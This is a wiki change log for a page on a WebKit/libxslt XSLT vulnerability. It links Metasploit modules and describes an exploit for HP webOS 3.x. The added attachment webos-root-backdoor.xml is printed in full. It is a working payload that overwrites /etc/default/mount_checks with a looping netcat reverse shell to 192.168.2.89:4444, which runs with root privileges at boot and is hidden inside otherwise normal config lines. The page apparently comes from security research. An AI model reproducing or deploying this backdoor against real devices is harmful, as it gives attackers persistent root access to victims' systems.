Changes for page Application_Webkit

Summary

• Page properties (1 modified, 0 added, 0 removed)
• Attachments (0 modified, 2 added, 0 removed)
  • ipad-tmp-owned.png
  • webos-root-backdoor.xml

Details

Page properties

Content

...	...	@@ -28,7 +28,7 @@
28	28
29	29	PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability.
30	30
31		-== Exploits ==
	31	+== Meatsploit ==
32	32
33	33	Two modules are included in Metasploit :
34	34
...	...	@@ -35,7 +35,9 @@
35	35	* a [[auxiliary>>http://www.metasploit.com/modules/auxiliary/server/webkit_xslt_dropper||rel="__blank"]] working on any non-sandboxed non-patched Webkit device
36	36	* an [[exploit>>http://www.metasploit.com/modules/exploit/windows/browser/safari_xslt_output||rel="__blank"]] plugin targeting Safari users with Admin privileges (because of the MOF trick)
37	37
38		-An exploit for HP webOS is attached. This exploit drops a backdoor executed with root privileges at boot time :
	38	+== HP webOS 3.x ==
39	39
40		-* XML contains the payload : destination file name + file content. A reverse-shell based on netcat is added to the script
41		-* XSL reads the XML file and create the requested file on disk
	40	+An exploit for HP webOS 3.x was developed. This exploit drops a backdoor which is later executed with root privileges at boot time. The exploit is composed of two files :
	41	+
	42	+* [[webos-root-backdoor.xml>>attach:webos-root-backdoor.xml]] contains the configurable data (name and content of the destination file) and a processing instruction trigger the XSLT code
	43	+* [[webos-root-backdoor.xsl>>attach:webos-root-backdoor.xsl]] reads the XML file and create the requested file on disk. This version overwrites a script located in /etc/default/ with a version including a reverse-shell based on netcat

ipad-tmp-owned.png

Author

...	...	@@ -1,0 +1,1 @@
	1	+xwiki:XWiki.NicolasGregoire

Size

...	...	@@ -1,0 +1,1 @@
	1	+11.9 KB

Content

webos-root-backdoor.xml

Author

...	...	@@ -1,0 +1,1 @@
	1	+xwiki:XWiki.NicolasGregoire

Size

...	...	@@ -1,0 +1,1 @@
	1	+1.7 KB

Content

...	...	@@ -1,0 +1,54 @@
	1	+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
	2	+<?xml-stylesheet type="text/xsl" href="xslt2root.xsl"?>
	3	+<exploit><location>/etc/default/mount_checks</location><content><![CDATA[# -*- mode: conf; -*-
	4	+
	5	+# Backdoor, by Nicolas Gregoire / Agarri
	6	+IP="192.168.2.89"
	7	+PORT="4444"
	8	+
	9	+MKNOD="/bin/mknod"
	10	+NC="/usr/bin/nc"
	11	+FIFO="/tmp/.a"
	12	+
	13	+( $MKNOD $FIFO p; while true; do { sleep 1; $NC $IP $PORT < $FIFO | /bin/sh &> $FIFO ; } done ; rm $FIFO ) &
	14	+# End backdoor
	15	+
	16	+
	17	+# Set this to save a file across reboots to indictate on boot that
	18	+# umount happened correctly (and that, e.g. battery wasn't pulled)
	19	+MOUNT_STAMP=/var/umount.stamp
	20	+# tags used in MOUNT_STAMP
	21	+REASON_MARK=reason
	22	+CLEAN_UMOUNT_MARK=date
	23	+
	24	+# name of system property holding true/false based on presence of
	25	+# $MOUNT_STAMP. Ignored if MOUNT_STAMP not set; must be defined
	26	+# otherwise
	27	+MOUNT_PROPERTY=last_umount_clean
	28	+
	29	+# file that contains 1 if / should be remounted rw, 0 otherwise
	30	+REMOUNT_TOKEN="/etc/.rootfs_RW"
	31	+
	32	+# If an fsck or reformat of /media/internal was required on boot, set
	33	+# this property.
	34	+MEDIA_FIX_PROPERTY=media_fixed_how
	35	+
	36	+WIPE_FLAGS_DIR=/var/.flags
	37	+WIPE_FLAGS_FILE=$WIPE_FLAGS_DIR/on_mount
	38	+WIPE_PROGRESS=/var/.sought_blocks
	39	+
	40	+# MMC_PROTECT_OPTS=-f
	41	+MMC_PROTECT_OPTS=""
	42	+MMC_PROTECT_DISABLED=1
	43	+mmc_boot_update() {
	44	+ if which mmc_protect >/dev/null && test -z "$MMC_PROTECT_DISABLED" ; then
	45	+ BOOT_DEV=$(sed 's,.*root=\(/dev/[^ ]*\) .*,\1,' < /proc/cmdline)
	46	+ ON_OFF=1 # on by default
	47	+ if [ -f "$REMOUNT_TOKEN" -a "$(cat $REMOUNT_TOKEN)" = "1" ]; then
	48	+ ON_OFF=0
	49	+ fi
	50	+ mmc_protect $MMC_PROTECT_OPTS -D "$BOOT_DEV" -p $ON_OFF
	51	+ fi
	52	+}
	53	+]]></content></exploit>
	54	+